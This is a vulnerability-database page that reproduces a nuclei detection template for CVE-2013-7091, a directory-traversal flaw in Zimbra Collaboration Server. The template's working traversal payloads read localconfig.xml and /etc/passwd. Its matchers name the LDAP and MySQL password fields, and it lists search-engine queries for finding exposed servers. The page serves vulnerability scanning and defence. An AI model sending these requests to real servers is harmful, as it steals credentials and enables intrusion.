Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 41 Views

Zimbra Collaboration Server LFI vulnerability allows remote attackers to read arbitrary files and potentially execute arbitrary code

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today		Zimbra Collaboration Server LFI Vulnerability
24 Dec 201300:00
zdt
Circl		CVE-2013-7091
6 Dec 201300:00
circl
Check Point Advisories		Zimbra Collaboration Server Local File Inclusion (CVE-2013-7091)
12 Jan 201400:00
checkpoint_advisories
CVE		CVE-2013-7091
13 Dec 201318:00
cve
Cvelist		CVE-2013-7091
13 Dec 201318:00
cvelist
Dsquare		Zimbra iCollaboration Server LFI
27 Aug 201600:00
dsquare
Exploit DB		Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)
24 Dec 201300:00
exploitdb
Metasploit		Zimbra Collaboration Server LFI
17 Dec 201318:32
metasploit
Nmap		http-vuln-cve2013-7091 NSE Script
4 May 201415:11
nmap
NVD		CVE-2013-7091
13 Dec 201318:07
nvd
Rows per page
id: CVE-2013-7091

info:
  name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
  author: rubina119
  severity: medium
  description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-7091
    - https://www.exploit-db.com/exploits/30085
    - https://www.exploit-db.com/exploits/30472
    - http://www.exploit-db.com/exploits/30085
    - http://packetstormsecurity.com/files/124321
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2013-7091
    cwe-id: CWE-22
    epss-score: 0.86196
    epss-percentile: 0.99705
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: synacor
    product: zimbra_collaboration_suite
    shodan-query:
      - http.title:"zimbra collaboration suite"
      - http.title:"zimbra web client sign in"
    fofa-query:
      - title="zimbra web client sign in"
      - title="zimbra collaboration suite"
    google-query:
      - intitle:"zimbra collaboration suite"
      - intitle:"zimbra web client sign in"
  tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "zimbra_server_hostname"
          - "zimbra_ldap_userdn"
          - "zimbra_ldap_password"
          - "ldap_postfix_password"
          - "ldap_amavis_password"
          - "ldap_nginx_password"
          - "mysql_root_password"
        condition: or

      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100e9d4a9e9d46a21e4954e4557becd945df4eb16df4846c6e6621c1187dc76e780022100f7590d45f8986c708051bc02f977704fa8e3d4efd9e5eddb8d63164b2d29554b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
EPSS0.86196
cve2013packetstormzimbralfiedbsynacordirectory traversalarbitrary codeldap
41